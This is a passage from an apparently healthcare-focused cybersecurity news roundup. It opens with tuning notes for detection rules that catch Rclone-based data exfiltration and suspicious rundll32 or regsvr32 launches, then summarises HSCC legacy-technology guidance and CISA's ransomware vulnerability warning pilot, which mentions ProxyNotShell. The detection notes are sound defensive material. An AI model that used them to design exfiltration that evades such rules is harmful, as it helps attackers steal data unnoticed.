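The Rclone rule deliberately ignores the file name, because the binary is routinely renamed to blend in with system processes; the price is that any command with a transfer verb and a `name:path` token needs review, so tune the verb list and remote pattern against the backup and sync tooling actually used in your environment. The parent process is carried into each hit because an Office application or a web browser spawning rundll32 or regsvr32 is a far stronger signal than the same process launched from an installer.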

You can view the full analysis of the group along with the recommended defensive measures and mitigations here.

HSCC Issues Guidance for Healthcare Organizations on Managing Legacy Technology Security

This month, the Healthcare and Public Health Sector Coordinating Council (HSCC) Cybersecurity Working Group (CWG) published guidance to help healthcare delivery organizations effectively manage cyber risks associated with legacy technology. In healthcare, a great deal of attention has been focused on addressing cybersecurity risks associated with legacy medical devices, but they are not the only type of legacy technology in use in healthcare environments. Many different technologies are used that similarly become more vulnerable as they age, and continue to be used after end-of-life has been reached and support is withdrawn. Technologies include FDA-regulated devices, non-FDA-regulated devices, laboratory equipment, building and facilities technology, and a host of other technologies.

While the obvious solution from a security perspective is to upgrade to modern, supported systems ahead of the technologies reaching end-of-life, that is often not practical or possible. Instead, healthcare delivery organizations need to effectively manage the risks associated with these technologies. Vulnerabilities in these technologies can be exploited by malicious actors, which can threaten patient privacy and patient safety. Unfortunately, many healthcare organizations that use legacy technologies have limited staff and resources to devote to protecting these technologies, which means vulnerabilities can persist indefinitely.

The guidance – Health Industry Cybersecurity – Managing Legacy Technology Security (HIC-MaLTS) – details best practices and makes several recommendations for healthcare delivery organizations, medical device manufacturers, and other technology providers whose products are used in healthcare environments. The guidance explains that all of these entities have a shared responsibility to ensure legacy technologies can be used securely in clinical environments while staying one step ahead of modern cyber threats. HSCC encourages healthcare delivery organizations, medical device manufacturers, and other technology providers to work together to effectively manage risk.

The guidance is the result of three years of work by 67 industry and government member organizations, including healthcare delivery organizations, medical device manufacturers, trade groups, government representatives, security experts, and health IT companies. The guidance covers the four core pillars of a comprehensive legacy technology cyber risk management program: governance, communications, cyber risk management, and future-proofing legacy technologies, and includes general and specific recommendations for each of those pillars in an easily actionable format.

CISA Launches Ransomware Vulnerability Warning Pilot Program

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has launched a new pilot program in response to the increase in ransomware attacks on critical infrastructure entities. The program aims to help those entities better protect their systems by getting exploitable vulnerabilities in their Internet-facing systems fixed before ransomware actors find them.

The Ransomware Vulnerability Warning Pilot (RVWP) program is authorized under the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) of 2022 and commenced on January 30, 2023. Under the program, CISA scans Internet-exposed systems for vulnerabilities that ransomware actors could exploit to gain access to an entity's network. CISA's regional cybersecurity personnel then alert the affected entities so that the flaws can be fixed before ransomware gangs or other malicious actors exploit them. CISA notes that critical infrastructure entities may be unaware of exploitable vulnerabilities in their systems and may discover an unpatched flaw only after it has been exploited in a ransomware attack. The RVWP program leverages existing services, data sources, technologies, and authorities, including CISA's Cyber Hygiene Vulnerability Scanning service and the Administrative Subpoena Authority granted to CISA under Section 2009 of the Homeland Security Act of 2002.

The program focuses on vulnerabilities in Internet-facing systems that ransomware gangs are known to have exploited in previous attacks. Under the RVWP program, CISA has already notified almost 100 critical infrastructure entities that they have Microsoft Exchange servers with unaddressed ProxyNotShell vulnerabilities (CVE-2022-41040 and CVE-2022-41082), which ransomware gangs have widely exploited over the past few months.

“Ransomware attacks continue to cause untenable levels of harm to organizations across the country, including target rich, resource-poor entities like many school districts and hospitals,” said Eric Goldstein, Executive Assistant Director for Cybersecurity, CISA. “The RVWP will allow CISA to provide timely and actionable information that will directly reduce the prevalence of damaging ransomware incidents affecting American organizations. We encourage every organization to urgently mitigate vulnerabilities identified by this program and adopt strong security measures consistent with the U.S. government’s guidance on StopRansomware.gov.” CISA also encourages critical infrastructure entities to report ransomware attacks to the U.S. government via the FBI’s Internet Crime Complaint Center or CISA’s incident reporting system.

The RVWP program is one of several initiatives CISA has launched in the past two years in response to ransomware attacks on critical infrastructure entities and government agencies, including the attacks on Colonial Pipeline, JBS Foods, and Kaseya. These include the addition of a Ransomware Readiness Assessment (RRA) module to its Cyber Security Evaluation Tool (CSET), the formation of the Joint Cyber Defense Collaborative (JCDC), a public-private partnership that proactively gathers, analyzes, and shares actionable cyber risk information, and the launch of its StopRansomware website, which serves as a one-stop shop for alerts and ransomware resources.